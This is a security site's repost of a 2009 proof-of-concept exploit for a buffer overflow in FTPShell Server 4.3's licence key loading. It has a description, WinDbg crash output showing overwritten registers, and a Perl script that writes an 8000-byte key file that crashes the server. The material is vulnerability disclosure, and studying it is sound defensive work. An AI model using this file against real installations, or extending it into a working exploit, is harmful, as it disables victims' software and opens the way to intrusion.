首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC 来源：http://www.zeroscience.org 作者：LiquidWorm 发布时间：2009-01-23   #!/usr/bin/perl # # Title: FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC # # Summary: FTPShell server is a windows FTP service that enables remote file downloads and uploads. # It supports regular and secure FTP based on both SSL/TLS and SSH2. It is also extremely easy to # configure and use. # # Product web page: http://www.ftpshell.com/index.htm # # Desc: FTPShell Server 4.3 suffers from buffer overflow vulnerability that can be exploited remotely or localy. # It fails to perform adequate boundry condition of the input .key file, allowing us to overwrite the EAX and EDX # registers. When trying to install licence with less than 8000 bytes we get a message: "It appears that your key # file is corrupt or invalid.", but when installing a licence with 8000 bytes we get a message: "Your licence key # has been succesfully loaded. Please restart the program." # # Note: When you restart the program, it will always crash untill you repair it or reinstall it. # # # ---------------------------------WinDbg------------------------------------- # # (1178.1d4): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00b159c0 ecx=00b159c0 edx=41414141 esi=00b1c630 edi=00000005 # eip=004039a0 esp=0012f3bc ebp=00000000 iopl=0         nv up ei pl nz na pe nc # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206 # # ftpshelldscp+0x39a0: # 004039a0 ff5210          call    dword ptr [edx+10h]  ds:0023:41414151=???????? # # ---------------------------------------------------------------------------- # # # Tested on Microsoft Windows XP Professional SP2 (English) # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm [t00t] gmail [w00t] com # # http://www.zeroscience.org # # 22.01.2009 # #################################################################################### $file = "Yes_Man.key"; $payload = "\x41" x 8000; print "\n\n[-] Buffering malicious playlist file. Please wait...\r\n"; sleep (1); open (key, ">./$file") || die "\nCan't open $file: $!"; print key "$payload"; close (key); print "\n\n[+] File $file successfully created!\n\n\a";   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Pardal CMS <= 0.2.0 Blind SQL ·VUPlayer 2.49 .ASX local unive ·Browser3D 3.5 (.sfs File) Loca ·GuildFTPd FTP server version 0 ·Browser3D version 3.5 local bu ·Nokia DX200 M13 and S12 TCP SY ·Joomla com_pcchess (game_id) B ·EleCard MPEG PLAYER (.m3u file ·Sad Raven's Click Counter 1.0 ·MediaMonkey 3.0.6 (.m3u file) ·Firefox 3.0.5 Status Bar Obfus ·PostgreSQL 8.2/8.3/8.4 UDF for   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved